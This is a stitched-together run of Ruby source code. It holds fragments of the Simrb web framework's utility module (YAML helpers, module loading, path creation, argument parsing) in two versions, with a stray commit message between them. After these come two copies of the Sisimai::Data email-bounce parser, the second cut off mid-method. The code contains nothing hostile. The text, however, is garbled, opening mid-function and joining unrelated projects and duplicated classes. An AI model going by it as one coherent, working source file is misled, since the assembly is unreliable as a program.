File.open(path, 'w+') do | f |
f.write data.to_yaml
end
end
def p args
res = ""
if args.class.to_s == 'Array'
res = args.join("\n")
elsif args.class.to_s == 'Hash'
args.each do | k, v |
res << "#{k.to_s.ljust(15)} => #{v}\n"
end
res = res.chomp "\n"
else
res = args.to_s
end
puts "="*30 + "\n" + res + "\n" + "="*30
end
def load_module
dirs = []
module_ds = {}
# get the path of module
if Scfg[:only_enable_modules].empty?
dirs = Dir["#{Spath[:module]}*"]
else
Scfg[:only_enable_modules].each do | name |
path = "#{Spath[:module]}#{name}"
dirs << path if File.exist?(path)
end
end
# load the info of module
dirs.each do | path |
path = "#{path}#{Spath[:modinfo]}"
content = Simrb.yaml_read path
name = content[0]["name"]
order = (content[0]["order"] || 99)
module_ds[name] = order unless Scfg[:disable_modules].include?(name.to_s)
end
# sort the module by order field
res = []
module_ds = module_ds.sort_by { |k, v| v }
module_ds.each do | item |
res << item[0]
end
res
end
def path_init path
unless File.exist?(path)
if path[-1] == '/'
Dir.mkdir(path)
else
File.open(path, 'w+') do | f |
f.write("")
end
end
end
end
def is_root_dir?
unless File.exist? 'scfg'
Simrb.p "Current command only allow to be used under root directory of project"
exit
end
end
# format the input arguments from an array into two items:
# the first item is the array of positional arguments, the last is a hash of options
#
# == Example
#
# args, opts = Simrb.format_input ["test", "test2", "--test", "--name=test2", "-n=test3"]
#
# the above is same as
#
# args, opts = Simrb.format_input ["--test", "test", "test2", "--name=test2", "-n=test3"]
#
# the options that starts with "-" you can write any positions of argument
#
# output
#
# args = ["test", "test2"]
# opts = {test: true, name: test2, n:test3}
#
def format_input args = []
resa = [] # return an array
resh = {} # return an hash
unless args.empty?
args.each do | item |
if item[0] == "-"
new_item = item.split("-").uniq.last
if new_item.index "="
key, val = new_item.split "="
resh[key.to_sym] = val
else
resh[new_item.to_sym] = true
end
else
resa << item
end
end
end
[resa, resh]
end
end
# basic path definition
Spath = {
# root path of project
:module => 'modules/',
:public => 'public/',
:db_dir => 'db/',
:upload_dir => 'db/upload/',
:backup_dir => 'db/backup/',
:tmp_dir => 'tmp/',
:cache_dir => 'tmp/cache/simrb/',
:install_lock_file => 'tmp/install.lock',
:log_dir => 'log/',
:server_log => 'log/thin.log',
:command_log => 'log/command_error_log.html',
# sub path under module directory of project
:tool => '/tool/',
:logic => '/logic/',
:store => '/boxes/',
:lang => '/boxes/langs/',
:doc => '/boxes/docs/',
:schema => '/boxes/migrations/',
:install => '/boxes/installs/',
:modinfo => '/boxes/installs/_mods',
:vars => '/boxes/installs/_vars',
:menu => '/boxes/installs/_menu',
:tpl => '/boxes/tpls/',
:layout_css => '/boxes/tpls/layout.css',
:common_css => '/boxes/tpls/common.css',
:misc => '/boxes/misc/',
:gemfile => '/boxes/misc/Gemfile',
:view => '/views/',
:assets => '/views/assets/',
:gitignore => '/.gitignore',
:route => '/routes.rb',
:readme => '/README.md',
}
# default settings of scfg file
Scfg = {
:time_types => ['created', 'changed'],
:fixnum_types => ['order', 'level'],
:number_types => ['Fixnum', 'Integer', 'Float'],
:field_alias => {int:'Fixnum', str:'String', text:'Text', time:'Time', big:'Bignum', fl:'Float'},
:init_module_path => [:store, :lang, :schema, :install, :modinfo, :misc, :gemfile, :view, :assets, :readme, :route],
:init_root_path => [:db_dir, :upload_dir, :backup_dir, :tmp_dir, :log_dir, :module],
:environment => 'development', # or production, test
:only_enable_modules => [],
:disable_modules => [],
:encoding => 'utf-8',
:lang => 'en',
:install_lock => 'yes',
:db_connection => 'sqlite://db/data.db',
:server_log_mode => 'file',
:repo_source => 'https://github.com/',
:server => 'thin',
:bind => '0.0.0.0',
:port => 3000,
:init_scfg_item => [:lang, :db_connection, :environment, :bind, :port],
}
end
# load config file in shortcut pipe
Scfg = Simrb::Scfg
if File.exist? 'scfg'
Simrb.yaml_read('scfg').each do | k, v |
Scfg[k.to_sym] = v
end
end
# load path in shortcut pipe
Spath = Simrb::Spath
if File.exist? 'spath'
Simrb.yaml_read('spath').each do | k, v |
Spath[k.to_sym] = v
end
end
# load modules
Smodules = Simrb.load_module
improve path_init method
Sroot = Dir.pwd + '/'
module Simrb
  # Common utility methods shared by the command line tool and the
  # running application: YAML helpers, console output, module discovery
  # and path bootstrapping.
  class << self
    # Read a YAML file and return the parsed data structure.
    # Returns an empty Array when the file is missing or unparsable, so
    # callers can iterate the result without a nil check.
    def yaml_read path
      require 'yaml'
      YAML.load_file path
    rescue
      []
    end

    # Serialize +data+ to YAML and write it to +path+, truncating any
    # existing content.
    def yaml_write path, data
      require "yaml"
      File.open(path, 'w+') do | f |
        f.write data.to_yaml
      end
    end

    # Pretty-print +args+ (Array, Hash, or anything else) framed by a
    # "=" ruler, for human-readable console output.
    def p args
      res = ""
      if args.class.to_s == 'Array'
        res = args.join("\n")
      elsif args.class.to_s == 'Hash'
        args.each do | k, v |
          res << "#{k.to_s.ljust(15)} => #{v}\n"
        end
        res = res.chomp "\n"
      else
        res = args.to_s
      end
      puts "="*30 + "\n" + res + "\n" + "="*30
    end

    # Collect the names of installed modules, honoring the
    # only_enable_modules / disable_modules settings, and return them
    # sorted by their "order" field (default 99).
    def load_module
      dirs = []
      module_ds = {}
      # get the path of module
      if Scfg[:only_enable_modules].empty?
        dirs = Dir["#{Spath[:module]}*"]
      else
        Scfg[:only_enable_modules].each do | name |
          path = "#{Spath[:module]}#{name}"
          dirs << path if File.exist?(path)
        end
      end
      # load the info of module
      dirs.each do | path |
        path = "#{path}#{Spath[:modinfo]}"
        content = Simrb.yaml_read path
        # Skip modules whose _mods info file is missing, empty or
        # malformed: yaml_read returns [] on failure, and content[0]
        # would be nil (the previous code raised NoMethodError here).
        next unless content.is_a?(Array) && content[0].is_a?(Hash)
        name = content[0]["name"]
        order = (content[0]["order"] || 99)
        module_ds[name] = order unless Scfg[:disable_modules].include?(name.to_s)
      end
      # sort the module by order field
      res = []
      module_ds = module_ds.sort_by { |k, v| v }
      module_ds.each do | item |
        res << item[0]
      end
      res
    end

    # Create +path+ unless it already exists: a trailing "/" denotes a
    # directory, anything else an empty file. Parent directories are
    # created as needed (Dir.mkdir used to fail on nested paths), and no
    # open file handle is leaked (the previous File.new(path, 'w') was
    # never closed).
    def path_init path
      require 'fileutils'
      unless File.exist?(path)
        if path[-1] == '/'
          FileUtils.mkdir_p(path)
        else
          FileUtils.mkdir_p(File.dirname(path))
          FileUtils.touch(path)
        end
      end
    end

    # Guard: abort the process unless the current working directory is a
    # project root, detected by the presence of its 'scfg' file.
    def is_root_dir?
      unless File.exist? 'scfg'
        Simrb.p "Current command only allow to be used under root directory of project"
        exit
      end
    end

    # format the input argument from an array to two item,
    # first item is orgin array, last is an hash option
    #
    # == Example
    #
    #   args, opts = Simrb.format_input ["test", "test2", "--test", "--name=test2", "-n=test3"]
    #
    # the above is same as
    #
    #   args, opts = Simrb.format_input ["--test", "test", "test2", "--name=test2", "-n=test3"]
    #
    # the options that starts with "-" you can write any positions of argument
    #
    # output
    #
    #   args = ["test", "test2"]
    #   opts = {test: true, name: test2, n:test3}
    #
    def format_input args = []
      resa = [] # return an array: the positional arguments
      resh = {} # return an hash: the "-"/"--" options
      unless args.empty?
        args.each do | item |
          if item[0] == "-"
            # strip the leading dashes; "--name=x".split("-") leaves the payload last
            new_item = item.split("-").uniq.last
            if new_item.index "="
              key, val = new_item.split "="
              resh[key.to_sym] = val
            else
              resh[new_item.to_sym] = true # bare flag, e.g. --test
            end
          else
            resa << item
          end
        end
      end
      [resa, resh]
    end
  end

  # basic path definition
  Spath = {
    # root path of project
    :module             => 'modules/',
    :public             => 'public/',
    :db_dir             => 'db/',
    :upload_dir         => 'db/upload/',
    :backup_dir         => 'db/backup/',
    :tmp_dir            => 'tmp/',
    :cache_dir          => 'tmp/cache/simrb/',
    :install_lock_file  => 'tmp/install.lock',
    :log_dir            => 'log/',
    :server_log         => 'log/thin.log',
    :command_log        => 'log/command_error_log.html',
    # sub path under module directory of project
    :tool               => '/tool/',
    :logic              => '/logic/',
    :store              => '/boxes/',
    :lang               => '/boxes/langs/',
    :doc                => '/boxes/docs/',
    :schema             => '/boxes/migrations/',
    :install            => '/boxes/installs/',
    :modinfo            => '/boxes/installs/_mods',
    :vars               => '/boxes/installs/_vars',
    :menu               => '/boxes/installs/_menu',
    :tpl                => '/boxes/tpls/',
    :layout_css         => '/boxes/tpls/layout.css',
    :common_css         => '/boxes/tpls/common.css',
    :misc               => '/boxes/misc/',
    :gemfile            => '/boxes/misc/Gemfile',
    :view               => '/views/',
    :assets             => '/views/assets/',
    :gitignore          => '/.gitignore',
    :route              => '/routes.rb',
    :readme             => '/README.md',
  }

  # default settings of scfg file (overridable at boot via the project
  # 'scfg' YAML file, so this Hash must stay mutable)
  Scfg = {
    :time_types           => ['created', 'changed'],
    :fixnum_types         => ['order', 'level'],
    :number_types         => ['Fixnum', 'Integer', 'Float'],
    :field_alias          => {int:'Fixnum', str:'String', text:'Text', time:'Time', big:'Bignum', fl:'Float'},
    :init_module_path     => [:store, :lang, :schema, :install, :modinfo, :misc, :gemfile, :view, :assets, :readme, :route],
    :init_root_path       => [:db_dir, :upload_dir, :backup_dir, :tmp_dir, :log_dir, :module],
    :environment          => 'development', # or production, test
    :only_enable_modules  => [],
    :disable_modules      => [],
    :encoding             => 'utf-8',
    :lang                 => 'en',
    :install_lock         => 'yes',
    :db_connection        => 'sqlite://db/data.db',
    :server_log_mode      => 'file',
    :repo_source          => 'https://github.com/',
    :server               => 'thin',
    :bind                 => '0.0.0.0',
    :port                 => 3000,
    :init_scfg_item       => [:lang, :db_connection, :environment, :bind, :port],
  }
end
# Shortcut constants pointing at the framework's settings tables.
Scfg = Simrb::Scfg
Spath = Simrb::Spath
# Merge project-local overrides into the defaults, in place: first the
# 'scfg' settings file, then the 'spath' path table. YAML keys arrive as
# strings and are stored under symbol keys.
{ 'scfg' => Scfg, 'spath' => Spath }.each do |file, table|
  next unless File.exist?(file)
  Simrb.yaml_read(file).each { |k, v| table[k.to_sym] = v }
end
# Discover the enabled modules (sorted by their "order" field).
Smodules = Simrb.load_module
# ----------------------------------------------------------------------
module Sisimai
  # Sisimai::Data generate parsed data from Sisimai::Message object.
  class Data
    # Imported from p5-Sisimai/lib/Sisimai/Data.pm
    require 'sisimai/address'
    require 'sisimai/rfc5322'     # Sisimai::RFC5322 is referenced below; was only loaded transitively
    require 'sisimai/smtp/reply'  # Sisimai::SMTP::Reply is called in #initialize
    require 'sisimai/smtp/status' # Sisimai::SMTP::Status is called in .make
    require 'sisimai/reason'
    require 'sisimai/string'
    require 'sisimai/rhost'
    require 'sisimai/time'
    require 'sisimai/datetime'
    require 'sisimai/smtp/error'

    @@rwaccessors = [
      :catch,           # [?] Results generated by hook method
      :token,           # [String] Message token/MD5 Hex digest value
      :lhost,           # [String] local host name/Local MTA
      :rhost,           # [String] Remote host name/Remote MTA
      :alias,           # [String] Alias of the recipient address
      :listid,          # [String] List-Id header of each ML
      :reason,          # [String] Bounce reason
      :action,          # [String] The value of Action: header
      :subject,         # [String] UTF-8 Subject text
      :timestamp,       # [Sisimai::Time] Date: header in the original message
      :addresser,       # [Sisimai::Address] From address
      :recipient,       # [Sisimai::Address] Recipient address which bounced
      :messageid,       # [String] Message-Id: header
      :replycode,       # [String] SMTP Reply Code
      :smtpagent,       # [String] Module(Engine) name
      :softbounce,      # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
      :smtpcommand,     # [String] The last SMTP command
      :destination,     # [String] The domain part of the "recipient"
      :senderdomain,    # [String] The domain part of the "addresser"
      :feedbacktype,    # [String] Feedback Type
      :diagnosticcode,  # [String] Diagnostic-Code: Header
      :diagnostictype,  # [String] The 1st part of Diagnostic-Code: Header
      :deliverystatus,  # [String] Delivery Status(DSN)
      :timezoneoffset,  # [Integer] Time zone offset(seconds)
    ]
    attr_accessor(*@@rwaccessors)

    RetryIndex = Sisimai::Reason.retry
    RFC822Head = Sisimai::RFC5322.HEADERFIELDS(:all)
    AddrHeader = { addresser: RFC822Head[:addresser], recipient: RFC822Head[:recipient] }.freeze

    # Constructor of Sisimai::Data
    # @param    [Hash] argvs    Data
    # @return   [Sisimai::Data] Structured email data
    def initialize(argvs)
      # Create email address object
      as = Sisimai::Address.make(argvs['addresser'])
      ar = Sisimai::Address.make(address: argvs['recipient'])
      return nil unless as.is_a? Sisimai::Address
      return nil unless ar.is_a? Sisimai::Address
      return nil if as.void
      return nil if ar.void

      @addresser      = as
      @recipient      = ar
      @senderdomain   = as.host
      @destination    = ar.host
      @alias          = argvs['alias'] || ''
      @token          = Sisimai::String.token(as.address, ar.address, argvs['timestamp'])
      @timestamp      = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
      @timezoneoffset = argvs['timezoneoffset'] || '+0000'
      @lhost          = argvs['lhost']          || ''
      @rhost          = argvs['rhost']          || ''
      @catch          = argvs['catch']          || nil
      @reason         = argvs['reason']         || ''
      @listid         = argvs['listid']         || ''
      @subject        = argvs['subject']        || ''
      @messageid      = argvs['messageid']      || ''
      @smtpagent      = argvs['smtpagent']      || ''
      @diagnosticcode = argvs['diagnosticcode'] || ''
      @diagnostictype = argvs['diagnostictype'] || ''
      @deliverystatus = argvs['deliverystatus'] || ''
      @smtpcommand    = argvs['smtpcommand']    || ''
      @feedbacktype   = argvs['feedbacktype']   || ''
      @action         = argvs['action']         || ''
      @replycode      = argvs['replycode']      || ''
      @replycode      = Sisimai::SMTP::Reply.find(argvs['diagnosticcode']).to_s if @replycode.empty?
      @softbounce     = argvs['softbounce']     || ''
    end

    # Another constructor of Sisimai::Data
    # @param          [Sisimai::Message] data Data Object
    # @param          [Hash] argvs            Parser options
    # @options argvs  [Boolean] delivered     true: Including "delivered" reason
    # @return         [Array, Nil]            List of Sisimai::Data or Nil if the
    #                                         argument is not Sisimai::Message object
    def self.make(data: nil, **argvs)
      return nil unless data
      return nil unless data.is_a? Sisimai::Message

      messageobj = data
      rfc822data = messageobj.rfc822
      fieldorder = { :recipient => [], :addresser => [] }
      objectlist = []
      givenorder = argvs[:order] || {}
      delivered1 = argvs[:delivered] || false

      return nil unless messageobj.ds
      return nil unless messageobj.rfc822

      # (the former "require 'sisimai/smtp'" was removed here: Sisimai::SMTP
      # itself is not used; only SMTP::Reply/Status/Error are, required above)

      # Decide the order of email headers: user specified or system default.
      if givenorder.is_a?(Hash) && !givenorder.empty?
        # If the order of headers for searching is specified, use the order
        # for detecting an email address.
        fieldorder.each_key do |e|
          # The order should be "Array Reference".
          next unless givenorder[e]
          next unless givenorder[e].is_a? Array
          next if givenorder[e].empty?
          fieldorder[e] += givenorder[e]
        end
      end

      fieldorder.each_key do |e|
        # If the order is empty, use default order.
        next unless fieldorder[e].empty?
        # Load default order of each accessor.
        fieldorder[e] = AddrHeader[e]
      end

      eachobject = messageobj.ds.dup
      while e = eachobject.shift do
        # Create parameters for new() constructor.
        p = {
          'catch'          => messageobj.catch  || nil,
          'lhost'          => e['lhost']        || '',
          'rhost'          => e['rhost']        || '',
          'alias'          => e['alias']        || '',
          'action'         => e['action']       || '',
          'reason'         => e['reason']       || '',
          'replycode'      => e['replycode']    || '',
          'smtpagent'      => e['agent']        || '',
          'recipient'      => e['recipient']    || '',
          'softbounce'     => e['softbounce']   || '',
          'smtpcommand'    => e['command']      || '',
          'feedbacktype'   => e['feedbacktype'] || '',
          'diagnosticcode' => e['diagnosis']    || '',
          'diagnostictype' => e['spec']         || '',
          'deliverystatus' => e['status']       || '',
        }
        unless delivered1
          # Skip if the value of "deliverystatus" begins with "2." such as 2.1.5
          next if p['deliverystatus'].start_with?('2.')
        end

        # EMAIL_ADDRESS:
        # Detect email address from message/rfc822 part
        fieldorder[:addresser].each do |f|
          # Check each header in message/rfc822 part
          next unless rfc822data[f]
          next if rfc822data[f].empty?
          j = Sisimai::Address.find(rfc822data[f]) || []
          next if j.empty?
          p['addresser'] = j[0]
          break
        end

        unless p['addresser']
          # Fallback: Get the sender address from the header of the bounced
          # email if the address is not set at loop above.
          j = Sisimai::Address.find(messageobj.header['to']) || []
          p['addresser'] = j[0] unless j.empty?
        end
        next unless p['addresser']
        next unless p['recipient']

        # TIMESTAMP:
        # Convert from a time stamp or a date string to a machine time.
        datestring = nil
        zoneoffset = 0
        datevalues = []
        datevalues << e['date'] unless e['date'].to_s.empty?

        # Date information did not exist in message/delivery-status part,...
        RFC822Head[:date].each do |f|
          # Get the value of Date header or other date related header.
          next unless rfc822data[f]
          datevalues << rfc822data[f]
        end

        # Set "date" getting from the value of "Date" in the bounce message
        datevalues << messageobj.header['date'] if datevalues.size < 2

        while v = datevalues.shift do
          # Parse each date value in the array
          datestring = Sisimai::DateTime.parse(v)
          break if datestring
        end

        if datestring && cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
          # Get the value of timezone offset from datestring
          # Wed, 26 Feb 2014 06:05:48 -0500
          datestring = cv[1]
          zoneoffset = Sisimai::DateTime.tz2second(cv[2])
          p['timezoneoffset'] = cv[2]
        end

        begin
          # Convert from the date string to an object then calculate time
          # zone offset.
          t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
          p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
        rescue
          warn ' ***warning: Failed to strptime ' << datestring.to_s
        end
        next unless p['timestamp']

        # OTHER_TEXT_HEADERS:
        recvheader = data.header['received'] || []
        unless recvheader.empty?
          # Get localhost and remote host name from Received header.
          %w[lhost rhost].each { |a| e[a] ||= '' }
          e['lhost'] = Sisimai::RFC5322.received(recvheader[0]).shift if e['lhost'].empty?
          e['rhost'] = Sisimai::RFC5322.received(recvheader[-1]).pop  if e['rhost'].empty?
        end

        %w[rhost lhost].each do |v|
          p[v].delete!('[]()') # Remove square brackets and round brackets from the host variable
          p[v].sub!(/\A.+=/, '') # Remove string before "="
          p[v].chomp!("\r") if p[v].end_with?("\r") # Remove CR at the end of the value
          # Check space character in each value and get the first element
          p[v] = p[v].split(' ', 2).shift if p[v].include?(' ')
          p[v].chomp!('.') if p[v].end_with?('.') # Remove "." at the end of the value
        end

        # Subject: header of the original message
        p['subject'] = rfc822data['subject'] || ''
        p['subject'].scrub!('?')
        p['subject'].chomp!("\r") if p['subject'].end_with?("\r")

        # The value of "List-Id" header
        p['listid'] = rfc822data['list-id'] || ''
        unless p['listid'].empty?
          # Get the value of List-Id header like "List name <list-id@example.org>"
          if cv = p['listid'].match(/\A.*([<].+[>]).*\z/) then p['listid'] = cv[1] end
          p['listid'].delete!('<>')
          p['listid'].chomp!("\r") if p['listid'].end_with?("\r")
          p['listid'] = '' if p['listid'].include?(' ')
        end

        # The value of "Message-Id" header
        p['messageid'] = rfc822data['message-id'] || ''
        unless p['messageid'].empty?
          # Leave only string inside of angle brackets(<>)
          if cv = p['messageid'].match(/\A([^ ]+)[ ].*/) then p['messageid'] = cv[1] end
          if cv = p['messageid'].match(/[<]([^ ]+?)[>]/) then p['messageid'] = cv[1] end
        end

        # CHECK_DELIVERY_STATUS_VALUE:
        # Cleanup the value of "Diagnostic-Code:" header
        unless p['diagnosticcode'].empty?
          # Count the number of D.S.N. and SMTP Reply Code
          vs = Sisimai::SMTP::Status.find(p['diagnosticcode'])
          vr = Sisimai::SMTP::Reply.find(p['diagnosticcode'])
          vm = 0
          re = nil

          if vs
            # How many times does the D.S.N. appeared
            vm += p['diagnosticcode'].scan(/\b#{vs}\b/).size
            p['deliverystatus'] = vs if vs =~ /\A[45][.][1-9][.][1-9]\z/
          end

          if vr
            # How many times does the SMTP reply code appeared
            vm += p['diagnosticcode'].scan(/\b#{vr}\b/).size
            # NOTE(review): p['replycode'] defaults to '' (truthy), so ||= only
            # assigns when the value is nil — confirm whether .empty? was intended.
            p['replycode'] ||= vr
          end

          if vm > 2
            # Build regular expression for removing string like '550-5.1.1'
            # from the value of "diagnosticcode"
            re = %r/[ ]#{vr}[- ](?:#{vs})?/
            # 550-5.7.1 [192.0.2.222] Our system has detected that this message is
            # 550-5.7.1 likely unsolicited mail. To reduce the amount of spam sent to Gmail,
            # 550-5.7.1 this message has been blocked. Please visit
            # 550 5.7.1 https://support.google.com/mail/answer/188131 for more information.
            p['diagnosticcode'] = Sisimai::String.sweep(p['diagnosticcode'].gsub(re, ' '))
          end
        end
        p['diagnostictype'] ||= 'X-UNIX' if p['reason'] == 'mailererror'
        p['diagnostictype'] ||= 'SMTP' unless %w[feedback vacation].include?(p['reason'])

        # Check the value of SMTP command
        p['smtpcommand'] = '' unless %w[EHLO HELO MAIL RCPT DATA QUIT].include?(p['smtpcommand'])

        if p['action'].empty?
          # Check the value of "action"
          if p['reason'] == 'expired'
            # Action: delayed
            p['action'] = 'delayed'
          elsif p['deliverystatus'].start_with?('5', '4')
            # Action: failed
            p['action'] = 'failed'
          end
        end

        o = Sisimai::Data.new(p)
        next unless o.recipient

        if o.reason.empty? || RetryIndex[o.reason]
          # Decide the reason of email bounce
          r = ''
          r = Sisimai::Rhost.get(o) if Sisimai::Rhost.match(o.rhost) # Remote host dependent error
          r = Sisimai::Reason.get(o) if r.empty?
          r = 'undefined' if r.empty?
          o.reason = r
        end

        if %w[delivered feedback vacation].include?(o.reason)
          # The value of reason is "vacation" or "feedback"
          o.softbounce = -1
          o.replycode = '' unless o.reason == 'delivered'
        else
          # Bounce message which reason is "feedback" or "vacation" does
          # not have the value of "deliverystatus".
          softorhard = nil

          if o.softbounce.to_s.empty?
            # The value is not set yet
            textasargv = (p['deliverystatus'] + ' ' + p['diagnosticcode']).lstrip
            softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, textasargv) || ''
            o.softbounce = if softorhard.size > 0
                             # Returned value is "soft" or "hard"
                             (softorhard == 'soft') ? 1 : 0
                           else
                             # Returned value is an empty string
                             -1
                           end
          end

          if o.deliverystatus.empty?
            # Set pseudo status code
            textasargv = (o.replycode + ' ' + p['diagnosticcode']).lstrip
            getchecked = Sisimai::SMTP::Error.is_permanent(textasargv)
            tmpfailure = getchecked.nil? ? false : (getchecked ? false : true)

            if pseudocode = Sisimai::SMTP::Status.code(o.reason, tmpfailure)
              # Set the value of "deliverystatus" and "softbounce"
              o.deliverystatus = pseudocode
              if o.softbounce < 0
                # set the value of "softbounce" again when the value is -1
                softorhard = Sisimai::SMTP::Error.soft_or_hard(o.reason, pseudocode)
                o.softbounce = if softorhard.size > 0
                                 # Returned value is "soft" or "hard"
                                 softorhard == 'soft' ? 1 : 0
                               else
                                 # Returned value is an empty string
                                 -1
                               end
              end
            end
          end

          unless o.replycode.empty?
            # Check both of the first digit of "deliverystatus" and "replycode"
            o.replycode = '' unless o.replycode[0, 1] == o.deliverystatus[0, 1]
          end
        end
        objectlist << o
      end
      return objectlist
    end

    # Convert from object to hash reference
    # @return   [Hash] Data in Hash reference
    def damn
      data = {}
      @@rwaccessors.each do |e|
        next if %w[addresser recipient timestamp].include?(e.to_s)
        data[e.to_s] = self.send(e) || ''
      end
      data['addresser'] = self.addresser.address
      data['recipient'] = self.recipient.address
      data['timestamp'] = self.timestamp.to_time.to_i
      return data
    end
    alias :to_hash :damn

    # Data dumper
    # @param    [String] type   Data format: json, yaml
    # @return   [String, Nil]   Dumped data or nil if the value of the first
    #                           argument is neither "json" nor "yaml"
    def dump(type = 'json')
      return nil unless %w[json yaml].include?(type)
      referclass = 'Sisimai::Data::' << type.upcase

      begin
        require referclass.downcase.gsub('::', '/')
      rescue
        warn '***warning: Failed to load' << referclass
      end

      dumpeddata = Module.const_get(referclass).dump(self)
      return dumpeddata
    end

    # JSON handler
    # @return   [String] JSON string converted from Sisimai::Data
    def to_json(*)
      return self.dump('json')
    end
  end
end
# Sisimai::SMTP is not used: the redundant "require 'sisimai/smtp'" inside Data.make was removed
module Sisimai
  # Sisimai::Data generate parsed data from Sisimai::Message object.
  class Data
    # Imported from p5-Sisimai/lib/Sisimai/Data.pm
    require 'sisimai/address'
    require 'sisimai/rfc5322'     # Sisimai::RFC5322 is referenced below; was only loaded transitively
    require 'sisimai/smtp/reply'  # Sisimai::SMTP::Reply is called in #initialize
    require 'sisimai/smtp/status' # Sisimai::SMTP::Status is called in .make
    require 'sisimai/reason'
    require 'sisimai/string'
    require 'sisimai/rhost'
    require 'sisimai/time'
    require 'sisimai/datetime'
    require 'sisimai/smtp/error'

    @@rwaccessors = [
      :catch,           # [?] Results generated by hook method
      :token,           # [String] Message token/MD5 Hex digest value
      :lhost,           # [String] local host name/Local MTA
      :rhost,           # [String] Remote host name/Remote MTA
      :alias,           # [String] Alias of the recipient address
      :listid,          # [String] List-Id header of each ML
      :reason,          # [String] Bounce reason
      :action,          # [String] The value of Action: header
      :subject,         # [String] UTF-8 Subject text
      :timestamp,       # [Sisimai::Time] Date: header in the original message
      :addresser,       # [Sisimai::Address] From address
      :recipient,       # [Sisimai::Address] Recipient address which bounced
      :messageid,       # [String] Message-Id: header
      :replycode,       # [String] SMTP Reply Code
      :smtpagent,       # [String] Module(Engine) name
      :softbounce,      # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
      :smtpcommand,     # [String] The last SMTP command
      :destination,     # [String] The domain part of the "recipient"
      :senderdomain,    # [String] The domain part of the "addresser"
      :feedbacktype,    # [String] Feedback Type
      :diagnosticcode,  # [String] Diagnostic-Code: Header
      :diagnostictype,  # [String] The 1st part of Diagnostic-Code: Header
      :deliverystatus,  # [String] Delivery Status(DSN)
      :timezoneoffset,  # [Integer] Time zone offset(seconds)
    ]
    attr_accessor(*@@rwaccessors)

    RetryIndex = Sisimai::Reason.retry
    RFC822Head = Sisimai::RFC5322.HEADERFIELDS(:all)
    AddrHeader = { addresser: RFC822Head[:addresser], recipient: RFC822Head[:recipient] }.freeze

    # Constructor of Sisimai::Data
    # @param    [Hash] argvs    Data
    # @return   [Sisimai::Data] Structured email data
    def initialize(argvs)
      # Create email address object
      as = Sisimai::Address.make(argvs['addresser'])
      ar = Sisimai::Address.make(address: argvs['recipient'])
      return nil unless as.is_a? Sisimai::Address
      return nil unless ar.is_a? Sisimai::Address
      return nil if as.void
      return nil if ar.void

      @addresser      = as
      @recipient      = ar
      @senderdomain   = as.host
      @destination    = ar.host
      @alias          = argvs['alias'] || ''
      @token          = Sisimai::String.token(as.address, ar.address, argvs['timestamp'])
      @timestamp      = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
      @timezoneoffset = argvs['timezoneoffset'] || '+0000'
      @lhost          = argvs['lhost']          || ''
      @rhost          = argvs['rhost']          || ''
      @catch          = argvs['catch']          || nil
      @reason         = argvs['reason']         || ''
      @listid         = argvs['listid']         || ''
      @subject        = argvs['subject']        || ''
      @messageid      = argvs['messageid']      || ''
      @smtpagent      = argvs['smtpagent']      || ''
      @diagnosticcode = argvs['diagnosticcode'] || ''
      @diagnostictype = argvs['diagnostictype'] || ''
      @deliverystatus = argvs['deliverystatus'] || ''
      @smtpcommand    = argvs['smtpcommand']    || ''
      @feedbacktype   = argvs['feedbacktype']   || ''
      @action         = argvs['action']         || ''
      @replycode      = argvs['replycode']      || ''
      @replycode      = Sisimai::SMTP::Reply.find(argvs['diagnosticcode']).to_s if @replycode.empty?
      @softbounce     = argvs['softbounce']     || ''
    end

    # Another constructor of Sisimai::Data
    # @param          [Sisimai::Message] data Data Object
    # @param          [Hash] argvs            Parser options
    # @options argvs  [Boolean] delivered     true: Including "delivered" reason
    # @return         [Array, Nil]            List of Sisimai::Data or Nil if the
    #                                         argument is not Sisimai::Message object
    def self.make(data: nil, **argvs)
      return nil unless data
      return nil unless data.is_a? Sisimai::Message

      messageobj = data
      rfc822data = messageobj.rfc822
      fieldorder = { :recipient => [], :addresser => [] }
      objectlist = []
      givenorder = argvs[:order] || {}
      delivered1 = argvs[:delivered] || false

      return nil unless messageobj.ds
      return nil unless messageobj.rfc822

      # Decide the order of email headers: user specified or system default.
      if givenorder.is_a?(Hash) && !givenorder.empty?
        # If the order of headers for searching is specified, use the order
        # for detecting an email address.
        fieldorder.each_key do |e|
          # The order should be "Array Reference".
          next unless givenorder[e]
          next unless givenorder[e].is_a? Array
          next if givenorder[e].empty?
          fieldorder[e] += givenorder[e]
        end
      end

      fieldorder.each_key do |e|
        # If the order is empty, use default order.
        next unless fieldorder[e].empty?
        # Load default order of each accessor.
        fieldorder[e] = AddrHeader[e]
      end

      eachobject = messageobj.ds.dup
      while e = eachobject.shift do
        # Create parameters for new() constructor.
        p = {
          'catch'          => messageobj.catch  || nil,
          'lhost'          => e['lhost']        || '',
          'rhost'          => e['rhost']        || '',
          'alias'          => e['alias']        || '',
          'action'         => e['action']       || '',
          'reason'         => e['reason']       || '',
          'replycode'      => e['replycode']    || '',
          'smtpagent'      => e['agent']        || '',
          'recipient'      => e['recipient']    || '',
          'softbounce'     => e['softbounce']   || '',
          'smtpcommand'    => e['command']      || '',
          'feedbacktype'   => e['feedbacktype'] || '',
          'diagnosticcode' => e['diagnosis']    || '',
          'diagnostictype' => e['spec']         || '',
          'deliverystatus' => e['status']       || '',
        }
        unless delivered1
          # Skip if the value of "deliverystatus" begins with "2." such as 2.1.5
          next if p['deliverystatus'].start_with?('2.')
        end

        # EMAIL_ADDRESS:
        # Detect email address from message/rfc822 part
        fieldorder[:addresser].each do |f|
          # Check each header in message/rfc822 part
          next unless rfc822data[f]
          next if rfc822data[f].empty?
          j = Sisimai::Address.find(rfc822data[f]) || []
          next if j.empty?
          p['addresser'] = j[0]
          break
        end

        unless p['addresser']
          # Fallback: Get the sender address from the header of the bounced
          # email if the address is not set at loop above.
          j = Sisimai::Address.find(messageobj.header['to']) || []
          p['addresser'] = j[0] unless j.empty?
        end
        next unless p['addresser']
        next unless p['recipient']

        # TIMESTAMP:
        # Convert from a time stamp or a date string to a machine time.
        datestring = nil
        zoneoffset = 0
        datevalues = []
